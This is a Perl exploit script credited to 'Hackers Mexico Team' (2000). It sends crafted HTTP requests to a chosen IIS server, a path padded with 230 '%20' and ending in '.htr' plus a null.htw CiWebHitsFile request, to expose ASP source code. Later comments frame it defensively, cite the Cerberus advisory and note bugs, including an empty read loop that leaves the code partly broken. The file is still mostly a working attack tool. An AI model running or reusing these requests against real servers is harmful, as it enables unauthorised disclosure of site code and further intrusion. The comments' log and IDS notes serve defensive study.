#!/usr/bin/perl
#---------------------------------------------------------------------#
# [ISM y ASP] Internet Information Server Buffer Overflow             #
# IIS ASP code to see whether ISM.DLL is in use (buffer overflow)     #
# and the null.htw bug                                                #
# Hackers Mexico Team 08/09/2000                                      #
# Written by Radikall radikall@hackers-mexico.org                     #
#---------------------------------------------------------------------#
# Greetings to Mulder <-- an hmt member.                              #
#---------------------------------------------------------------------#
# Copyright 2000 http://www.hackers-mexico.org                        #
#---------------------------------------------------------------------#
#
# Overview: this first part loads Socket, fixes the TCP port, reads the
# target URL from the command line and splits it into a host ($remote)
# and a path ($path). Everything is stored in package globals (there is
# no "use strict" / "use warnings"); the rest of the script reads them.
#
# Defensive context: the requests built later in the script are a path
# padded with a long run of "%20" and ending in ".htr", and a request for
# /null.htw carrying a CiWebHitsFile parameter. Both shapes stand out in
# web-server access logs and are suitable for IDS/log matching. The
# usual mitigation is the vendor fix plus removing the .htr / .htw script
# mappings where they are not needed; see Cerberus advisory CISADV000327,
# which the original author cites below.

use Socket;

# Port is hard-coded; there is no command-line option to change it.
$port=80;

# No (or false) first argument: print the usage banner and stop.
if (!($ARGV[0])) {
    print "\n[ISMyASP]\n";
    print "$0 http://host/view.asp \n";
    print "Hackers Mexico Team.\n";
    exit;
}

$url=$ARGV[0];
# Strip one trailing newline if the argument ends with one.
chop($url) if $url =~ /\n$/;
print "url: $url\n";

# Host: remove every "http://" occurrence, then delete from the first "/"
# onward. The class [^>] already matches newlines, so the deleted run only
# stops at a ">" or at the end of the string.
# NOTE(review): only the "http://" scheme is stripped, and a ":port" suffix
# in the URL would be left inside $remote.
$remote = $url;
$remote =~ s/http\:\/\///g;
$remote =~ s/\/([^>]|\n)*//g;
print "host: $remote\n";

# Path: the URL minus "http://" and minus the host text.
# NOTE(review): $remote is interpolated into the pattern unescaped (so "."
# matches any character) and /g removes every match, including any repeat
# of the host text further along the path. \Q$remote\E anchored at the
# start of the string would express the intent more safely.
$path = $url;
$path =~ s/http\:\/\///g;
$path =~ s/$remote//g;
print "path: $path\n";

# Number of "%20" units appended to the path when the .htr request is
# built further down.
$spaces=230; # This is the default value for the ISM.DLL file b.t (buffer truncation)
             # Remember: this attack only works once.
             # Read the Cerberus advisory CISADV000327.
# Second part of the script: build two HTTP/1.0 request strings in the
# global $submit, print each one, and hand each to post_message(), which
# opens a TCP connection to $remote:$port and sends it.
#
# Log/IDS view of what is emitted: (1) "GET <path>" followed by $spaces
# repetitions of "%20" and the suffix ".htr"; (2) "GET /null.htw?" with
# CiWebHitsFile=<path>%20. Neither request carries any header lines.

# Request 1: pad the path with "%20" $spaces times, then append ".htr".
$submit = "GET $path";
$i=0;
while($i < $spaces) {
    $submit= "$submit%20";
    $i++;
}
# The request is terminated with bare "\n\n" (LF only), not CRLF.
$submit= "$submit.htr HTTP/1.0\n\n";
print "======Trying ism.dll buffer truncation...\n";
print "submit: $submit\n\n";
# Called with the & sigil and no parentheses; the sub takes no arguments
# and works entirely from the globals $port, $remote and $submit.
&post_message;

# Request 2: /null.htw with the same path passed as CiWebHitsFile.
print "======Trying null.htw...\n";
$submit="GET /null.htw?CiWebHitsFile=$path%20&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n";
print "submit: $submit\n\n";
&post_message;

# post_message: connect to $remote on $port over TCP and send $submit.
# Reads globals only; dies (messages are in Spanish) when the port is
# missing, the host cannot be resolved, or socket/connect fails.
sub post_message {
    # A non-numeric port is treated as a service name and looked up.
    if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
    die("No port specified.") unless $port;

    # "Fallo al buscar el Host" = failed to look up the host.
    $iaddr = inet_aton($remote) || die("Fallo al buscar el Host: $remote");
    $paddr = sockaddr_in($port, $iaddr);
    $proto = getprotobyname('tcp');

    # SOCK is a bareword (package-global) handle, reused on every call.
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Fallo para abrir sockets: $!");
    connect(SOCK, $paddr) || die("No se puede conectar: $!");

    # NOTE(review): the return value of send() is not checked.
    send(SOCK,$submit,0);
    printf "\n======Waiting for reply [pray]....\n\n";

    # NOTE(review): the loop condition is empty in this copy of the file.
    # Perl treats an empty while() condition as always true, so as written
    # this never reads from SOCK, prints $_ repeatedly and does not reach
    # close(). The condition looks like it was lost when the page was
    # extracted -- confirm against an authoritative copy.
    while() { print $_; }
    close(SOCK);
}

# "FIN" = end.
print "\n\n======FIN. [Hackers Mexico Team]\n";
exit;
#:) radikall@hackers-mexico.org